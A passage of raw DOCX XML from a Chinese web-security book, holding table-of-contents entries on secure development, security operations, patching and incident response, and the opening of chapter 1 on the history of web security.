          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>计阶段</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>409</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>阶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>段</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>415</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>提供安全的函数</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>415</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>代码安全审计工具</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>417</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>阶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>段</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>418</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639997pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2344" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1317;top:414;width:7139;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7118" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安全</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>运</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>营</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>422</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>18</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-33"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>17.7</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>420</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>把安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>运营</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>来</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>422</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>修</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>补流程</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>423</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>监</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>控</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>424</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>入侵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>检</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>测</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>425</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>紧急</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>应流程</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>428</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="55"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>18.6</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>430</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:tabs>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="180"/>
        <w:ind w:left="954" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>（附</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>谈谈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>联网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>企</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>业</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>全的发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>方向</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>431</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="406"/>
        <w:ind w:left="0" w:right="219" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:w w:val="80"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>XV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sect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rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="70"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:w w:val="90"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>XVI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="70"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="86"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="1.1.1  中国黑客简史" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="01" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:b/>
          <w:sz w:val="80"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>我的安全世界观</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="79"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>互联网本来是安全的，自从有了研究安全的人之后，互联网就变得不安全了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="153" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250018" w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>安全简史</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="291"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>起初，研究计算机系统和网络的人，被称为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:bookmarkStart w:name="1.1  Web安全简史" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
